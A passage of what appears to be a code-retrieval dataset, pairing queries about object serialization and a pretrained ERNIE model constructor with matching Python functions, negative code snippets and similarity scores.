compare = seq[i:i+k]\n ham = ham_dist(pattern, compare)\n if ham < dist:\n dist = ham\n candidates = set([compare])\n elif ham == dist:\n candidates.add(compare)\n return dist, list(candidates)", "def parity_of_very_long(x, word_size=8):\n res = 0\n hash_map = {}\n while x!=0:\n word = x & ( (1<<word_size)-1)\n if not(word in hash_map):\n hash_map[word] = parityOf(word)\n res ^= hash_map[word]\n x >>= word_size\n print(hash_map)\n return res" ]
[ "0.7564989", "0.7524423", "0.7510748", "0.7498424", "0.73834527", "0.72914463", "0.7283258", "0.72027653", "0.719384", "0.7186409", "0.7184023", "0.7142286", "0.7130274", "0.71298635", "0.70760477", "0.70056623", "0.6964983", "0.69032145", "0.6894841", "0.68800247", "0.68678236", "0.6847591", "0.6843833", "0.68348813", "0.68032765", "0.679861", "0.6798262", "0.6720903", "0.6690633", "0.6689964", "0.6677139", "0.6624427", "0.65918225", "0.6574339", "0.6560529", "0.6547985", "0.6539195", "0.6530564", "0.64931387", "0.6428627", "0.6394444", "0.63378525", "0.6309431", "0.6280412", "0.6279953", "0.62666106", "0.6265662", "0.622406", "0.620244", "0.6182493", "0.6137575", "0.61345685", "0.61309725", "0.6082461", "0.60441476", "0.6035278", "0.5993141", "0.59876525", "0.59876525", "0.59718966", "0.5950343", "0.58973724", "0.5882149", "0.58103275", "0.5804133", "0.5800102", "0.579282", "0.5775148", "0.5751955", "0.5677118", "0.56623507", "0.5648066", "0.5630775", "0.5629104", "0.5625677", "0.5623185", "0.56020373", "0.56003517", "0.5594286", "0.55793524", "0.5549726", "0.55081326", "0.54752016", "0.54591656", "0.5457591", "0.5453111", "0.5452253", "0.5451286", "0.5443524", "0.54417264", "0.5432796", "0.5410906", "0.5402593", "0.5376072", "0.53671324", "0.5366137", "0.5365206", "0.5359972", "0.5359588", "0.53583986" ]
0.7553281
1
Implementation to serialize ``o`` argument.
def default(self, o: Decimal) -> Union[int, float]: if isinstance(o, Decimal): # NOTE: The below is potentially a HUGE MISTAKE and an # unnecessary OVER ENGINEERING! but this works. This is # not required as such because we can get around this by # converting everything to float by default but it makes # more sense to return response of ints as int and float as # float. return int(o) if float(o).is_integer() else float(o) return super().default(o)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialize(self, obj):\n pass", "def serialize(obj):\n return serialization_manager.serialize(obj)", "def serialize(self, obj):\n return obj", "def serialize(obj):\n return pickle.dumps(obj)", "def serialize_forstorage(cls, obj):\n return misc.serialize_forstorage(obj)", "def serialize(self, obj):\n return json.dumps(obj)", "def to_serializable(o: Any) -> Any:\n if isinstance(o, UUID):\n return str(o)\n if isinstance(o, datetime):\n return isoformat(o)\n if is_dataclass(o):\n return asdict(o)\n if hasattr(o, \"__json__\"):\n return o.__json__()\n if hasattr(o, \"to_dict\"):\n # api_client models all have a to_dict function\n return o.to_dict()\n if isinstance(o, BaseModel):\n return o.dict()\n raise TypeError(f\"Could not serialize object of type {o.__class__.__name__} to JSON\")", "def default(self, o):\n raise TypeError(repr(o) + \" is not JSON serializable\")", "def default(self, o):\n raise TypeError(\"%r is not JSON serializable\" % (o,))", "def default(self, o):\r\n raise TypeError(repr(o) + \" is not JSON serializable\")", "def serialize(cls, obj):\n return json.dumps(obj, cls=CustomTypeEncoder)", "def save_object(o, fn):\n return dump_object(o, fn)", "def serialize(self, data):", "def serialize(obj):\n\n # if isinstance(obj, date):\n # serial = obj.isoformat()\n # return serial\n #\n # if isinstance(obj, time):\n # serial = obj.isoformat()\n # return serial\n\n return obj.to_json()", "def json_dumps(o: Any) -> bytes:\n return json.dumps(\n o, indent=4, sort_keys=True, ensure_ascii=True, separators=(\",\", \": \"), cls=NumberEncoder\n ).encode(\"ascii\")", "def _serialize(\n self, value: typing.Any, attr: str | None, obj: typing.Any, **kwargs\n ):\n return value", "def encode(self, o):\n # Our encoding prepends an 'x:' prefix.\n return b'x:%s' % str(o.name).encode('utf-8')", "def encode(self, o):\n # Our encoding prepends an 'x:' prefix.\n return b'x:%s' % str(o.name).encode('utf-8')", "def serialize(obj):\n\n if isinstance(obj, datetime.datetime):\n serial = obj.replace(microsecond=0).replace(tzinfo=None).isoformat() + \"Z\"\n return serial\n\n if isinstance(obj, bytes):\n return obj.decode('utf-8')\n\n return obj.__dict__", "def serialize(obj):\n\n if isinstance(obj, datetime.datetime):\n serial = obj.replace(microsecond=0).replace(tzinfo=None).isoformat() + \"Z\"\n return serial\n\n if isinstance(obj, bytes):\n return obj.decode('utf-8')\n\n return obj.__dict__", "def serialize(obj):\n serial = repr(obj)\n try:\n if eval(serial) == obj:\n return serial\n except:\n pass\n try:\n serial = pickle.dumps(obj)\n return 'pickle.loads(%s)' % repr(serial)\n except:\n raise Exception #unable to serialize", "def json_serial(obj):\r\n\r\n\t\tif isinstance(obj,(datetime, date)):\r\n\t\t\treturn obj.isoformat()\r\n\t\traise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return str(obj) #.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def serialize(self, obj, for_read=False):\n\n serializer = self.get_serializer()\n return serializer.serialize(obj.to_python(for_read=for_read))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n if isinstance(obj, complex):\n return str(obj)\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial2(self, obj):\n if isinstance(obj, (datetime.datetime, datetime.date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def serializer(obj):\n if isinstance(obj, datetime):\n return obj.strftime(ISO_TIME_FORMAT)\n else:\n raise TypeError('%s is not serializable' % obj)", "def _json_serialize(obj: Any) -> str:\n if isinstance(obj, bytes):\n if len(obj) < 256:\n try:\n return obj.hex()\n except Exception:\n pass\n else:\n try:\n return obj.decode()\n except Exception:\n pass\n return '<not serializable>'", "def json_serial(obj):\n\n\tif isinstance(obj, (dt.datetime, dt.date)):\n\t\treturn obj.isoformat()\n\traise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\r\n\r\n if isinstance(obj, (datetime, date)):\r\n return obj.isoformat()\r\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def serialize(self, obj):\n return dill.dumps(obj, 0).decode('latin-1')", "def serialize(value, **kwargs):\n return value", "def _serialize(\n obj: object,\n to_proto: bool = True,\n to_bytes: bool = False,\n) -> Union[str, bytes, Message]:\n\n is_serializable: Serializable\n if not isinstance(obj, Serializable):\n if hasattr(obj, \"serializable_wrapper_type\"):\n is_serializable = obj.serializable_wrapper_type(value=obj) # type: ignore\n else:\n traceback_and_raise(\n Exception(f\"Object {type(obj)} has no serializable_wrapper_type\")\n )\n else:\n is_serializable = obj\n\n serialize_method = getattr(is_serializable, \"sy_serialize\", None)\n if serialize_method is None:\n serialize_method = getattr(is_serializable, \"serialize\", None)\n if serialize_method is None:\n raise Exception(f\"Object {type(obj)} has no serialize method\")\n\n return serialize_method(to_proto=to_proto, to_bytes=to_bytes)", "def serialize_datetime(self, obj):\r\n if isinstance(obj, datetime.datetime):\r\n return obj.isoformat()\r\n raise TypeError(\"Type not serializable\")", "def dump_payload(self, obj):\n return want_bytes(self.serializer.dumps(obj, **self.serializer_kwargs))", "def _serialize(obj, args, kwargs):\n curried = _curry_callable(obj, args, kwargs)\n return cPickle.dumps(curried, protocol=cPickle.HIGHEST_PROTOCOL)", "def serialize(file_location, obj):\n if obj is None:\n raise ValueError('ERROR: Can not serialize when object to serialize is None')\n with open(file_location, 'wb') as file:\n pickle.dump(obj, file=file)", "def serialize(self):\n pass", "def json_serial(obj):\n if isinstance(obj, LegipyModel):\n return obj.to_json()\n elif isinstance(obj, (datetime.date, datetime.datetime)):\n return obj.isoformat()\n raise TypeError(\"Type {0} not serializable\".format(repr(type(obj))))", "def serialize(self):", "def dump_object(self, value):\n return pickle.dumps(value)", "def serialize(self, data):\n raise NotImplementedError", "def pack(self, obj):\n # TODO: use a JSON encoder that handles more types?\n if obj is not None:\n return json.dumps(obj)", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date,date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def dumps(self, obj):\n # Most of the work is done in _serialize, but we have to tack on\n # the stop instruction after it all.\n return self.serialize(obj) + '.'", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def SerializeObject(self, data):\n\n if isinstance(data,dict):\n serializad_data = json.dumps(data)\n else:\n serializad_data = json.dumps(data.__dict__)\n\n return serializad_data", "def json_serial(obj):\n if isinstance(obj, (datetime.datetime, datetime.date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n if isinstance(obj, (dt.datetime, dt.date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def _to_serialize(value):\n return value.serialize() if value is not None else None", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n\n elif isinstance(obj, decimal.Decimal):\n if obj % 1 == 0:\n return int(obj)\n else:\n return float(obj)\n\n elif isinstance(obj, bytes):\n try:\n s = obj.decode()\n return s\n except Exception:\n return str(obj)\n\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def serialize(self, data):\r\n if data is None:\r\n return None\r\n elif type(data) is dict:\r\n return serializer.Serializer(\r\n self.get_attr_metadata()).serialize(data, self.content_type())\r\n else:\r\n raise Exception(_(\"Unable to serialize object of type = '%s'\") %\r\n type(data))", "def di_pickle(o):\n\tif o == None:\n\t\treturn \"None\"\n\tt = type(o)\n\tif t is types.IntType or t is types.LongType:\n\t\treturn \"i%d\" % o\n\tif t is types.BooleanType:\n\t\tif o:\n\t\t\treturn \"i1\"\n\t\telse:\n\t\t\treturn \"i0\"\n\tif t is types.FloatType:\n\t\treturn \"d%f\" % o\n\tif t is types.StringType:\n\t\treturn \"s'%s'\" % o.replace(\"'\", \"\\\\'\")\n\tif t is types.ListType:\n\t\treturn \"L(%s)\" % \"\".join([ di_pickle(x) for x in o])\n\tif isinstance(o, HashableList):\n\t\treturn \"L(%s)\" % \"\".join([ di_pickle(x) for x in o.list])\n\tif t is types.TupleType:\n\t\treturn \"T(%s)\" % \"\".join([ di_pickle(x) for x in o])\n\tif isinstance(o, (set, frozenset)):\n\t\treturn \"S(%s)\" % \"\".join([ di_pickle(x) for x in o])\n\tif t is types.DictType or isinstance(o, ImmutableDict):\n\t\treturn \"D(%s)\" % \"\".join([ \"%s%s\" % (di_pickle(k), di_pickle(v)) for k, v in o.items()])\n\traise \"Unsupported type in di_pickle()\", str(t)", "def jsonSerial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n\n if isinstance(obj, enum.Enum):\n return obj.value\n\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError (\"Type not serializable\")", "def json_serial(obj):\n\n if isinstance(obj, (datetime)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def default(self, o): # pylint: disable=E0202\n # E0202 ignored in favor of compliance with documentation:\n # https://docs.python.org/2/library/json.html#json.JSONEncoder.default\n try:\n return repr(o)\n except Exception: # pylint: disable=W0703\n return super(FailProofJSONEncoder, self).default(o)", "def serialize(obj, *args):\n value = obj(*args) if callable(obj) else obj\n return value.isoformat() if isinstance(value, (date, datetime)) else value", "def json_serial(obj):\n\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError (\"Type not serializable\")", "def do(self, obj):\n if isinstance(obj, str):\n return 'st__' + obj\n\n if type(obj) in literals:\n return obj\n\n # Now check for list, set, and tuple, and skip if they don't contain\n # any non-literals\n if type(obj) in builtin_iterables:\n if all(isinstance(x, literals) for x in flattened(obj)):\n return as_nested_lists(obj)\n\n oid = id(obj)\n if oid in self._working:\n raise GlueSerializeError(\"Circular reference detected\")\n self._working.add(oid)\n\n fun, version = self._dispatch(obj)\n logging.debug(\"Serializing %s with %s\", obj, fun)\n result = fun(obj, self)\n\n if isinstance(obj, types.FunctionType):\n result['_type'] = 'types.FunctionType'\n elif isinstance(obj, types.MethodType):\n result['_type'] = 'types.MethodType'\n else:\n result['_type'] = \"%s.%s\" % (type(obj).__module__,\n type(obj).__name__)\n if version > 1:\n result['_protocol'] = version\n\n self._working.remove(oid)\n return result", "def default(self, o):\n if isinstance(o, np.ndarray):\n return o.tolist()\n if isinstance(o, np.int64):\n return int(o)\n if isinstance(o, np.int32):\n return int(o)\n if isinstance(o, abc.ABCMeta):\n return str(o)\n return json.JSONEncoder.default(self, o)", "def serialize_obj(obj, filename):\n\n f = open(filename, 'wb')\n pickle.dump(obj, f)\n f.close()", "def json_serial(obj):\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError(\"Type not serializable\")", "def jdump(obj: t.Any, **kwargs) -> None:\n tools.jdump(obj=obj, **kwargs)", "def json_serial(obj):\n\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError(\"Type not serializable\")", "def json_serial(obj):\n\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError(\"Type not serializable\")", "def getValueAsString(self, o: ghidra.util.graph.KeyedObject) -> unicode:\n ...", "def dump_object(self, value):\n t = type(value)\n if t is int or t is long:\n return str(value)\n return '!' + pickle.dumps(value)", "def serialize_str(self, obj):\n if len(obj) < 0x100:\n return 'U' + struct.pack('<B', len(obj)) + obj\n return 'T' + struct.pack('<I', len(obj)) + obj", "def toJSON(cls, obj):\n return json.dumps(obj)", "def _serialize(self, state, handle):\n raise NotImplementedError", "def encode(self, obj):\n # type: (List[List[Any]]) -> str\n raise NotImplementedError()", "def _serialize(self, instance, owner):\n val = instance.__dict__[self._name]\n if val is None: return None\n return str(val)", "def dumps(self, obj, salt=None):\n payload = want_bytes(self.dump_payload(obj))\n rv = self.make_signer(salt).sign(payload)\n if self.is_text_serializer:\n rv = rv.decode(\"utf-8\")\n return rv", "def object_to_param_str(obj):\n return b64encode(compress(cPickle.dumps(obj))).decode('utf8')", "def _serialize(self, value, attr, obj, **kwargs) -> str | _T | None:\n if value is None:\n return None\n ret = self._format_num(value) # type: _T\n return self._to_string(ret) if self.as_string else ret", "def dumps_value(obj):\n type_key = type_keys.Value.assign(obj)\n\n if type_key == type_keys.Value.INTEGER:\n binary_data = struct.pack(\"!q\", obj)\n elif type_key == type_keys.Value.FLOAT:\n binary_data = struct.pack(\"!d\", obj)\n elif type_key == type_keys.Value.COMPLEX:\n binary_data = struct.pack(formats.COMPLEX_PACK, obj.real, obj.imag)\n elif type_key == type_keys.Value.NUMPY_OBJ:\n binary_data = common.data_to_binary(obj, np.save)\n elif type_key == type_keys.Value.STRING:\n binary_data = obj.encode(common.ENCODE)\n elif type_key in (type_keys.Value.NULL, type_keys.Value.CASE_DEFAULT):\n binary_data = b\"\"\n elif type_key == type_keys.Value.PARAMETER_VECTOR:\n binary_data = common.data_to_binary(obj, _write_parameter_vec)\n elif type_key == type_keys.Value.PARAMETER:\n binary_data = common.data_to_binary(obj, _write_parameter)\n elif type_key == type_keys.Value.PARAMETER_EXPRESSION:\n binary_data = common.data_to_binary(obj, _write_parameter_expression)\n else:\n raise exceptions.QpyError(f\"Serialization for {type_key} is not implemented in value I/O.\")\n\n return type_key, binary_data", "def stringify(self, *args, **kwargs):\n return json.dumps(self.serialize(*args, **kwargs), default=SerialClass.string_repr)", "def JsonComplexEncoder(obj):\n if isinstance(obj, bytes):\n return str(obj)\n else:\n return obj", "def serialisation_tournoi(tournoi):\n serialized_tournoi = {\n \"nom\": tournoi.nom,\n \"lieu\": tournoi.lieu,\n \"dates\": tournoi.dates,\n \"nb tours prevus\": tournoi.nombre_tours_prevus,\n \"id_participants\": tournoi.joueurs_id,\n \"tours_effectues\": tournoi.nb_tour_en_cours,\n \"tours_db\": tournoi.tours_db,\n \"description\": tournoi.description,\n \"type\": tournoi.type,\n \"id\": tournoi.id,\n \"en_cours\": tournoi.en_cours\n }\n return serialized_tournoi", "def iterencode(self, o):\n if self.check_circular:\n markers = {}\n else:\n markers = None\n return self._iterencode(o, markers)", "def serialize_obj(obj: Any) -> Any:\n if isinstance(obj, (datetime.date, datetime.datetime)):\n return obj.isoformat()\n else:\n return obj", "def serialize_obj(obj: Any) -> Any:\n if isinstance(obj, (datetime.date, datetime.datetime)):\n return obj.isoformat()\n else:\n return obj", "def serialise(obj):\n if isinstance(obj, datetime.datetime):\n # maybe assume UTC (as deserialise does the reverse)\n return obj.replace(tzinfo=du_tz.tzutc()).isoformat()\n\n if isinstance(obj, datetime.date):\n return obj.isoformat()\n\n if isinstance(obj, queue.Queue):\n return {}\n\n if isinstance(obj, (pagination.PaginatedResponse, BaseObject)):\n return obj.to_dict()\n\n try:\n return obj.to_dict()\n except AttributeError:\n pass\n\n raise TypeError(\"Object of type '%s' is not JSON serializable\" % obj.__class__.__name__)", "def serialize(self, value) -> bytes:\n pass", "def serialize(self) -> str:\n pass", "def format(self, obj):\n pass", "def format(self, obj):\n pass", "def serialize(self, data):\n return data", "def serialize(self, buff):\n try:\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v1 = val1.header\n buff.write(_struct_I.pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.confidence))\n _v3 = val1.roi\n _x = _v3\n buff.write(_struct_4IB.pack(_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def default(self, o):\n if isinstance(o, datetime):\n return o.strftime('%Y-%m-%d %H:%M:%S%z')\n\n if isinstance(o, Message):\n return MessageToDict(o)\n\n # if isinstance(o, RepeatedCompositeContainer):\n # return list(o)\n\n return super(CustomEncoder, self).default(o)", "def dumps(obj, *args, **kwargs): \n defaults = {\"indent\": 4}\n defaults.update(kwargs)\n return json.dumps(serialize(obj), *args, **defaults)", "def json_serial(obj):\n\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n # return unix_time_millis(obj)\n raise TypeError(\"Type not serializable\")", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_h16fh8f().pack(_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, _x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def dump(self, obj):\r\n return self.localpath.dump(obj)" ]
[ "0.76455027", "0.71864474", "0.71055853", "0.6807475", "0.6794227", "0.66385746", "0.66352147", "0.6566663", "0.65611637", "0.6546735", "0.6452253", "0.64283395", "0.63991266", "0.6386263", "0.63441694", "0.6334144", "0.6327756", "0.6327756", "0.6322545", "0.6322545", "0.63178676", "0.6299019", "0.6292506", "0.626825", "0.6258309", "0.6231637", "0.62236816", "0.62229973", "0.62024564", "0.6165685", "0.61639166", "0.61574274", "0.6148288", "0.6138519", "0.6121005", "0.611452", "0.6103508", "0.60955274", "0.6093845", "0.6083734", "0.6079324", "0.6074728", "0.60744536", "0.6039429", "0.60343325", "0.60343325", "0.60343325", "0.60343325", "0.60147154", "0.6003486", "0.6001114", "0.6001114", "0.6000731", "0.59976256", "0.5977198", "0.5975042", "0.5965438", "0.5948937", "0.594336", "0.5935585", "0.59328234", "0.59253323", "0.5923617", "0.591571", "0.59151995", "0.59128404", "0.5908176", "0.5902367", "0.58947015", "0.5894053", "0.58773", "0.58773", "0.58755046", "0.5875384", "0.58579797", "0.58533055", "0.58516395", "0.5837387", "0.5830134", "0.58028543", "0.5794657", "0.5787738", "0.5773677", "0.57720083", "0.57577085", "0.57575226", "0.5756353", "0.57550466", "0.57550466", "0.5754975", "0.57514536", "0.5739093", "0.5730289", "0.5730289", "0.5729034", "0.5726566", "0.5718635", "0.57171315", "0.5708703", "0.5705437", "0.56987906" ]
0.0
-1
Fundamental pretrained Ernie model
def __init__(self, cfg, name=''): nn.Layer.__init__(self) self.cfg = cfg d_model = cfg['hidden_size'] d_emb = cfg.get('emb_size', cfg['hidden_size']) d_vocab = cfg['vocab_size'] d_pos = cfg['max_position_embeddings'] # d_sent = cfg.get("sent_type_vocab_size", 4) or cfg.get('type_vocab_size', 4) if cfg.get('sent_type_vocab_size'): d_sent = cfg['sent_type_vocab_size'] else: d_sent = cfg.get('type_vocab_size', 2) self.n_head = cfg['num_attention_heads'] self.return_additional_info = cfg.get('return_additional_info', False) self.initializer = nn.initializer.TruncatedNormal(std=cfg['initializer_range']) self.ln = _build_ln(d_model, name=append_name(name, 'pre_encoder')) self.word_emb = nn.Embedding(d_vocab, d_emb, weight_attr=paddle.ParamAttr(name=append_name(name, 'word_embedding'), initializer=self.initializer)) self.pos_emb = nn.Embedding(d_pos, d_emb, weight_attr=paddle.ParamAttr(name=append_name(name, 'pos_embedding'), initializer=self.initializer)) # self.sent_emb = nn.Embedding( # d_sent, # d_emb, # weight_attr=paddle.ParamAttr(name=append_name(name, 'sent_embedding'), initializer=self.initializer)) self._use_sent_id = cfg.get('use_sent_id', True) self._use_sent_id = False if self._use_sent_id: self.sent_emb = nn.Embedding(d_sent, d_emb, weight_attr=paddle.ParamAttr(name=append_name(name, 'sent_embedding'), initializer=self.initializer)) self._use_task_id = cfg.get('use_task_id', False) self._use_task_id = False if self._use_task_id: self._task_types = cfg.get('task_type_vocab_size', 3) logging.info('using task_id, #task_types:{}'.format(self._task_types)) self.task_emb = nn.Embedding(self._task_types, d_emb, weight_attr=paddle.ParamAttr(name=append_name(name, 'task_embedding'), initializer=self.initializer)) prob = cfg['hidden_dropout_prob'] self.dropout = nn.Dropout(p=prob) self.encoder_stack = ErnieEncoderStack(cfg, append_name(name, 'encoder')) if cfg.get('has_pooler', True): self.pooler = _build_linear(cfg['hidden_size'], cfg['hidden_size'], append_name(name, 'pooled_fc'), self.initializer) else: self.pooler = None self.key_tag = None self._checkpoints = [] self.train()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pretrained():\n launch_training_on_all_splits(experiment='full', splits=NAME_SPLIT, base_model='pretrained', dropout=0.7987, learning_rate=0.00009659)", "def load_pretrained_model(model_name):\n if model_name==\"AlexNet\":\n print(\"Loading pretrained AlexNet Model\")\n model_ft = models.alexnet(pretrained=True)\n\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet18\":\n print(\"Loading pretrained ResNet18 Model\")\n model_ft = models.resnet18(pretrained=True)\n\n for param in model_ft.parameters(): # Code for fixing the Conv Layer\n param.requires_grad = False # During Training Conv layer does not learn.\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet50\":\n print(\"Loading pretrained ResNet50 Model\")\n\n model_ft = models.resnet50(pretrained=True)\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, 100)\n elif model_name==\"DenseNet\":\n print(\"Loading pretrained DenseNet161 Model\")\n model_ft = models.densenet161(pretrained=True)\n\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, 100)\n\n if cfg.load_model_true:\n model_ft.load_state_dict(torch.load(cfg.load_model_path))\n\n return model_ft", "def resnet34(pretrained=False, **kwargs):\n model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)\n # model_dict = model.state_dict()\n\n if pretrained:\n # pretrained_dict=model_zoo.load_url(model_urls['resnet34'],model_dir='/home/FENGsl/JBHI/Pretrain_model')\n # pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}\n # model_dict.update(pretrained_dict)\n model.load_state_dict(model_zoo.load_url(model_urls['resnet34'], model_dir='/home/FENGsl/JBHI/Pretrain_model'))\n print('===> Pretrain Model Have Been Loaded, Please fasten your seat belt and get ready to take off!')\n return model", "def evaluate(args):\n dataset_param_filepath = os.path.join(args.model, 'dataset.params')\n dataset_params = putils.load_params(dataset_param_filepath)\n source_vocab_filepath = os.path.join(args.model, 'source.vocab')\n source_vocab = Vocab(vocab_filepath=source_vocab_filepath)\n target_vocab_filepath = os.path.join(args.model, 'target.vocab')\n target_vocab = Vocab(vocab_filepath=target_vocab_filepath)\n model_params_filepath = os.path.join(args.model, 'model.params')\n model_params = putils.load_params(model_params_filepath)\n checkpoint_filepath = os.path.join(args.model, 'checkpoint.tar')\n if not torch.cuda.is_available() and model_params['cuda']:\n logger.info('Loading a GPU-trained model on CPU')\n checkpoint = torch.load(checkpoint_filepath,\n map_location=const.DEVICE)\n elif torch.cuda.is_available() and model_params['cuda']:\n logger.info('Loading a GPU-trained model on GPU')\n checkpoint = torch.load(checkpoint_filepath)\n elif torch.cuda.is_available() and not model_params['cuda']:\n logger.info('Loading a CPU-trained model on GPU')\n checkpoint = torch.load(checkpoint_filepath,\n map_location='cuda:0')\n else:\n logger.info('Loading a CPU-trained model on CPU')\n checkpoint = torch.load(checkpoint_filepath)\n encoder = Encoder(model_type=checkpoint['encoder']['model_type'],\n input_size=checkpoint['encoder']['input_size'],\n hidden_size=checkpoint['encoder']['hidden_size'],\n num_layers=checkpoint['encoder']['num_layers'],\n nonlinearity=checkpoint['encoder']['nonlinearity'],\n bias=checkpoint['encoder']['bias'],\n dropout=checkpoint['encoder']['dropout'],\n bidirectional=checkpoint['encoder']['bidirectional'])\n if checkpoint['with_attention']:\n decoder = Attention(model_type=checkpoint['decoder']['model_type'],\n hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n max_seq_len=dataset_params['max_seq_len'],\n num_layers=checkpoint['decoder']['num_layers'],\n nonlinearity=checkpoint['decoder']['nonlinearity'],\n bias=checkpoint['decoder']['bias'],\n dropout=checkpoint['decoder']['dropout'],\n bidirectional=checkpoint['decoder']['bidirectional'])\n else:\n decoder = Decoder(model_type=checkpoint['decoder']['model_type'],\n hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n num_layers=checkpoint['decoder']['num_layers'],\n nonlinearity=checkpoint['decoder']['nonlinearity'],\n bias=checkpoint['decoder']['bias'],\n dropout=checkpoint['decoder']['dropout'],\n bidirectional=checkpoint['decoder']['bidirectional'])\n encoder.load_state_dict(checkpoint['encoder_state_dict'])\n decoder.load_state_dict(checkpoint['decoder_state_dict'])\n if torch.cuda.is_available():\n encoder.to(const.DEVICE)\n decoder.to(const.DEVICE)\n encoder.eval()\n decoder.eval()\n indexes = putils.index_dataset(\n args.data, source_vocab.item2idx, target_vocab.item2idx,\n dataset_params['is_character_based'], dataset_params['max_seq_len'],\n dataset_params['is_reversed'])\n if args.random > 0:\n random.shuffle(indexes)\n for seq_num in range(args.random):\n seq = indexes[seq_num]\n print('-'*80)\n print('>', ' '.join([source_vocab.idx2item[idx]\n for idx in seq[0]]))\n print('=', ' '.join([target_vocab.idx2item[idx]\n for idx in seq[1]]))\n # TODO: add support for OOV\n predicted_idx, _ = _decode(seq[0], encoder, decoder,\n checkpoint['with_attention'],\n 